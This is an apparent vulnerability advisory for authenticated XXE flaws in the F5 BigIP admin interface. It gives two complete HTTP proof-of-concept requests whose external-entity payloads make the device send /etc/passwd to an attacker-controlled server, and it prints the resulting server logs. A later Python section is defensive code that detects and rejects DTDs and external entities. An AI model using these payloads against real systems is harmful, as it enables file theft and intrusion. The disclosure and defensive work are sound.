F5 BigIP XXE Vulnerabilities (CVE-2014-6032 and CVE-2014-6033) - Authenticated

Vulnerable Systems:

Description:

It was established that the web application was vulnerable to an XML External Entity injection attack.

POC #1:

The vulnerable URL is redacted due to the number of affected systems.
The following XML payload was used to trigger the XXE.

POST /tmui/deal HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 212
Content-Type: application/xml; charset=UTF-8
Cookie: JSESSIONID=4E6247F892F0068DF87C57D5CFAEF5D1; BIGIPAuthCookie=EB9425D2D7B6B954BACBCEA4082343FCBB095616; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5_refreshpage=/tmui/Control/jspmap/tmui/system/user/properties.jsp%3Fname%3Dadmin; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay="/tmui/system/settings/properties.jsp?.configuration_table"; f5formpage="/tmui/system/sw_updates/hotfix_list.jsp?&"
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
%int;
%trick;]>
<deal type="request" id="1"><card type="query" id="1"/></deal>
On the attacker server, the file contents can be read from the web server logs:
10.1.10.10 - - [20/Aug/2014:00:17:44 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128
- -> /xml?f=/etc/passwd
10.1.10.10 - - [20/Aug/2014 00:17:44] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0013

POC #2: Please note that the contents parameter needs to be fully URL-encoded.

POST /tmui/dashboard/viewset.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=4E6247F892F0068DF87C57D5CFAEF5D1; BIGIPAuthCookie=EB9425D2D7B6B954BACBCEA4082343FCBB095616; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION="[All]"; f5_refreshpage="https%3A//192.168.235.216/tmui/Control/jspmap/tmui/system/memory/stats.jsp%3F"; f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay="/tmui/system/settings/properties.jsp?.configuration_table,/tmui/locallb/monitor/properties.jsp?name=/Common/http.configuration_table"; f5formpage="/tmui/overview/welcome/introduction.jsp?about=true&about=true"
Connection: keep-alive
Referer: https://x.x.x.x/tmui/dashboard/MonitorDashboardModule.swf
Content-type: application/x-www-form-urlencoded
Content-Length: 1810

action=write&contents=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
%int;
%trick;]><viewList>
  <view id="asd">
    <window>
      <setting name="x" value="0"/>
      <setting name="height" value="256"/>
      <setting name="y" value="190"/>
      <setting name="typeId" value="BwControlTemplWindow"/>
      <setting name="selectedMode" value="Both"/>
      <setting name="width" value="508"/>
    </window>
    <window>
      <setting name="x" value="515"/>
      <setting name="height" value="256"/>
      <setting name="toggleOn" value="true"/>
      <setting name="y" value="0"/>
      <setting name="typeId" value="MemWindow"/>
      <setting name="selectedMode" value="Both"/>
      <setting name="width" value="508"/>
      <setting name="viewSwitch" value="false"/>
    </window>
  </view>
</viewList>&name=asdasd
Please note that the payload needs to be completely URL-encoded to trigger properly.

On the attacker server, the file contents can be read from the web server logs:
10.1.10.10 - - [20/Aug/2014 00:37:18] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128 0.0008
10.1.10.10 - - [20/Aug/2014:00:37:18 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128
- -> /xml?f=/etc/passwd
10.1.10.10 - - [20/Aug/2014 00:37:18] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0010

Impact:

XML External Entity injection vulnerabilities arise because the XML specification allows XML documents to define entities that reference resources external to the document. XML parsers typically support this feature by default, even though applications rarely require it during normal usage. External entities can reference files on the parser's filesystem, and exploiting this may allow the retrieval of arbitrary files or cause a denial-of-service condition (by making the server read from a file such as /dev/random).
External entities can also reference URLs, potentially allowing port scanning from the XML parser's host, or the retrieval of sensitive web content that would otherwise be inaccessible due to network topology and defenses.
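The application-side fix for the class of bug described above is to refuse any DOCTYPE before the parser ever sees it (the "disallow-doctype-decl" setting of a hardened Java parser). The following Python is an added example written for this page, not F5's code and not a model of what runs inside tmui: it is a request guard that extracts the XML from both request shapes shown in the two POCs, rejects any document carrying a DTD or an external entity declaration, and only then parses it. It also shows the edge case the advisory notes for POC #2: because the contents field arrives URL-encoded, a check that does not decode the form body first never sees the DOCTYPE at all. The form field name "contents", the endpoint shapes and the sample bodies are constructed from the advisory's requests, with the attacker host replaced by a placeholder.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, quote

# Any DTD is rejected outright: the parameter-entity chain in the advisory
# (%remote; -> %int; -> %trick;) needs an internal DTD subset to live in, and
# ordinary API requests carry none. The second pattern names the specific
# construct so an operator can tell a stray DOCTYPE from an actual XXE attempt.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
_EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def extract_xml(body: str, content_type: str) -> str:
    """Return the XML document carried by an HTTP request body.

    application/xml bodies (POC #1 shape) are the document itself. For
    application/x-www-form-urlencoded bodies (POC #2 shape) the document sits
    in a form field and arrives URL-encoded, so it must be decoded before any
    inspection. Assumption: the field is named 'contents', as in the advisory.
    """
    if content_type.startswith("application/x-www-form-urlencoded"):
        fields = parse_qs(body, keep_blank_values=True)
        return fields.get("contents", [""])[0]
    return body


def classify(xml_text: str) -> str:
    """Classify a document as 'clean', 'doctype' or 'external-entity'."""
    if _EXTERNAL_ENTITY_RE.search(xml_text):
        return "external-entity"
    if _DOCTYPE_RE.search(xml_text):
        return "doctype"
    return "clean"


def parse_strict(body: str, content_type: str):
    """Parse the request's XML, refusing anything that declares a DTD.

    Returns the root element on success and raises ValueError otherwise, so
    the caller can log the verdict and return a 400 instead of parsing.
    """
    xml_text = extract_xml(body, content_type)
    verdict = classify(xml_text)
    if verdict != "clean":
        raise ValueError(f"rejected request: {verdict}")
    return ET.fromstring(xml_text)


# Constructed sample requests modelled on the advisory's two POCs (not the
# original captures; the attacker host is a placeholder).
XXE_DTD = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    "<!DOCTYPE root [\n"
    '<!ENTITY % remote SYSTEM "http://ATTACKER_HOST/xml?f=/etc/passwd"> %remote;\n'
    "%int;\n"
    "%trick;]>"
)
POC1_BODY = XXE_DTD + '<deal type="request" id="1"><card type="query" id="1"/></deal>'
POC2_BODY = (
    "action=write&contents="
    + quote(XXE_DTD + '<viewList><view id="asd"/></viewList>', safe="")
    + "&name=asdasd"
)
BENIGN_BODY = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<deal type="request" id="1"><card type="query" id="1"/></deal>'
)


def triage(body: str, content_type: str) -> str:
    """Verdict for a request after decoding it the way the endpoint would."""
    return classify(extract_xml(body, content_type))


if __name__ == "__main__":
    for label, body, ctype in (
        ("POC #1 (application/xml)", POC1_BODY, "application/xml"),
        ("POC #2 (form, decoded)", POC2_BODY, "application/x-www-form-urlencoded"),
        ("benign deal request", BENIGN_BODY, "application/xml"),
    ):
        print(f"{label}: {triage(body, ctype)}")
    # A check run on the raw, still-encoded form body sees no DOCTYPE at all.
    print(f"POC #2 (form, NOT decoded): {classify(POC2_BODY)}")
```

The last line of the demo is the point of the advisory's URL-encoding note seen from the defender's side: a WAF rule or log search for the literal string "<!DOCTYPE" misses the viewset.jsp variant entirely unless the form body is decoded first.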

Recommendation:

Please see F5’s advisory for patch details.
http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15605.html

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.